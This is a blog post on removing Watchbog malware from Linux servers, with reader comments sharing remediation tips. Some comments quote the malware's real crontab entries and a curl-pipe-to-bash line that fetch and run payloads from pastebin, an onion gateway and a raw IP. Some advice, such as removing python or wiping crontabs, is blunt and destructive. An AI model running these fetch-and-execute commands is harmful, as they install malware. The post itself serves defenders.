Saturday, 10 November 2018

Blocking Watchbog Malware/Ransomware with IPTables on Linux

Block the IP by the following commands.

iptables -A INPUT -s 104.20.208.21 -j DROP

iptables -A OUTPUT -s 104.20.208.21 -j DROP

iptables -A OUTPUT -j DROP -d 104.20.208.21

Now save the newly added IPtables configuration with below command.

/sbin/service iptables save

Additionally If you don't have any Application dependencies you can uninstall the below packages.

wget
curl
python

If you have dependences then, rename the binaries.
e.g.

#mv /usr/bin/curl /usr/bin/lruc

same for 'wget' and 'python'. 

Yum will not work as python is renamed or removed

This is a malware/ramsonware. You must delete it from your system, Process and files.


It runs under any user or root user, find the process called "watchbog".

You can find this username with "top" or in output of this comand:

ps aux | grep watchbog

Then kill with -9 the process sustes, use the below command

ps -ef | grepwatchbog

kill -9 <PID>


Then look at cron job of this user:

crontab -u username -l

If it has this string

* * * * https://pastebin.com/

delete all by

crontab -r -u username

Then delete these files

/usr/bin/watchbog


Then delete these folders

/tmp/*timesyncc.service*


20 comments:

  1. Greetings
    I have a recurring instance of this "watchbog" infection.
    I have taken steps to cripple it. However, I should like to ask you if you have any idea how it invades a server?

    ReplyDelete
  2. I want to find out too, how i got infected!?

    my temporary fix is to run a loop inside a screen session to kill watchbog as it reappears.
    1) enter a new screen session by typing: screen
    2) grant sudo permissions by typing: sudo su
    3) write this oneliner: while true ; do killall watchbog ; done
    4) then press CTRL+A+D key combo, and the screen session will continue run in background, so the process gets killed instantly if reappears.

    ReplyDelete
  3. Hi Sudhakar,

    I followed all the steps except uninstalling curl and python. With no luck Watchbog process is reappearing.
    Looking at the temporary solution provided by one of the comments I am killing watchbog inside a while loop but in single screen session.

    $ while true ; do killall watchbog ; done

    And I am keeping session open in puTTY.
    Please update if you find any permanent fix.

    Thank you for the post.

    ReplyDelete
  4. Also, Blocking IP address using iptables is not helping as IP is getting changed every time I kill the process.

    ReplyDelete
  5. OK, so we installed a fresh UBUNTU 18.04.1, with fresh webserver packages. Copied WWW and SQl data and ITS BACK!!!, so probably this WATCHBOG virus infects the system thru the web services, but that really sounds impossible.
    On the new server, port 22 is open only from certain IP`s
    Passwords are different than previous server. the only thing witch got transffered is WWW-DATA and SQL

    ReplyDelete
    Replies
    1. It was probably in your www-data folder.

      Delete
  6. I followed above steps. But instead of IP tables I used our cloud provider's external firewall to block internet access.
    After that I proceeded as you mentioned but the virus kept coming back.
    I then realized it downloaded scripts from pastebin.
    I pointed pastebin.com and gitee.com to localhost in /etc/hosts. After that it stopped.

    ReplyDelete
    Replies
    1. "I pointed pastebin.com and gitee.com to localhost in /etc/hosts." This is the best idea !

      It gives me some time before re-installing !
      Thanks a lot !

      Delete
    2. Thanks a lot! Now can focus on finding the cause of how it got in and re-installing.

      Delete
    3. Thanks a lot Man. it worked but one more thing . Sometime they do use IP to get the script like
      curl -s http://107.174.47.156/mr.sh | bash -sh
      so it is better to remove curl and wget ( if do not need it) .
      FYI this is temp solution to buy the time for fixing it permanently

      Delete
  7. Replies
    1. Thanks for forcing you affiliate link on the unsuspecting that might actually believe you have provided a possible solution to this issue. Go find a better way to make your cash please sir!!

      Delete
  8. I created a script. It seems to be a reasonable solution for those who haven't updated their web server software yet, or can't for some technical reason. I hope folks find it helpful.

    https://github.com/blackrangersoftware/kill4watchbog

    ReplyDelete
  9. After many attempts at last this solution definitely worked for me!!! Thank you so much!

    ReplyDelete
  10. i removed crontab access to solr user and also deleted all tmp files ..

    ReplyDelete
  11. I found watchbog virus in one of my linux machine and here is what I did step by step that I finally manage to kill the virus. The virus is having a hidden process that create cronjob and use up the CPU. This can be detected by the following command:

    ps -eo pcpu,pid,user,args | sort -k 1 -r | head -10

    %CPU PID USER COMMAND
    31.5 8128 root ./watchbog
    31.5 8116 root ./watchbog
    31.4 8140 root ./watchbog
    So what to do? First, check the content of the crontab:

    crontab -l

    */11 * * * * (curl -fsSL https://pastebin.com/raw/EzqVke6X||wget -q -O- https://pastebin.com/raw/EzqVke6X||python -c 'import urllib2 as fbi;print fbi.urlopen("https://pastebin.com/raw/4HvzGfGm").read()'||curl -fsSL https://pastebin.com/raw/3FDDiNwW||wget -q -O - https://pastebin.com/raw/3FDDiNwW||curl -fsSLk https://aziplcr72qjhzvin.onion.to/old.txt||wget -q -O - https://aziplcr72qjhzvin.onion.to/old.txt --no-check-certificate -t 2 -T 60)|bash
    ##
    */11 * * * * (curl -fsSL https://pastebin.com/raw/EzqVke6X||wget -q -O- https://pastebin.com/raw/EzqVke6X||python -c 'import urllib2 as fbi;print fbi.urlopen("https://pastebin.com/raw/4HvzGfGm").read()'||curl -fsSL https://pastebin.com/raw/3FDDiNwW||wget -q -O - https://pastebin.com/raw/3FDDiNwW||curl -fsSLk https://aziplcr72qjhzvin.onion.to/old.txt||wget -q -O - https://aziplcr72qjhzvin.onion.to/old.txt --no-check-certificate -t 2 -T 60)|bash
    ##
    Thus, the virus is automatically creating crontab. We can remove the crontab using the following command:

    crontab –r

    Then we can check if it is already empty using the following command:

    ls /var/spool/cron/crontabs

    If it has some content (e.g. root) then it means the new cron job was created.

    Since the the virus is using curl, urllib2 or wget, we need to temporarily uninstall them:

    pip uninstall urllib2
    apt-get remove --auto-remove curl
    apt-get remove --auto-remove wget
    Then, we remove the cron job and then kill the process.

    crontab -r while true ; do killall watchbog ; done

    Let us see again if it works.

    crontab -l ps -eo pcpu,pid,user,args | sort -k 1 -r | head -10

    There is no more watchbog.

    Then do not forget to change the password

    sudo passwd root

    Kardi
    https://people.revoledu.com/kardi/tutorial/

    ReplyDelete
  12. Hello there! I just want to offer you a big thumbs up for your great info you have right here on this post. I'll be coming back to your web site for more soon.

    ReplyDelete